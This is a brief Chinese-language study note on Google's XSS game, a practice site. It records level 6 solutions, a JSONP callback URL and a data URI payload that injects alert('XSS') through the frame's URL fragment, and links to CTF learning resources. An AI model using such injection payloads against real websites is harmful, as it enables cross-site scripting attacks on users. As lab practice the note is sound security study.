https://xss-game.appspot.com/

XSS-games

a标签 href 运行 javascript

6 //www.google.com/jsapi?callback=alert

https://xss-game.appspot.com/level6/frame#data:text/javascript,alert(‘XSS’) 这个是js的一种Data URI(https://en.wikipedia.org/wiki/Data_URI_scheme)，可以将其视为资源的加载方式，其中的资源包括代码，比如这种形式data:text/javascript;base64,javascript代码因此可以这样注入。

参考

• CSDN

  • 网络安全 ctf 比赛/学习资源整理，解题工具、比赛时间、解题思路、实战靶场、学习路线，推荐收藏！

  • CTF-Web 小白入门篇超详细——了解 CTF-Web 基本题型及其解题方法 总结——包含例题的详细题解

• 知乎

  • XSS-games

• google xss game 通关攻略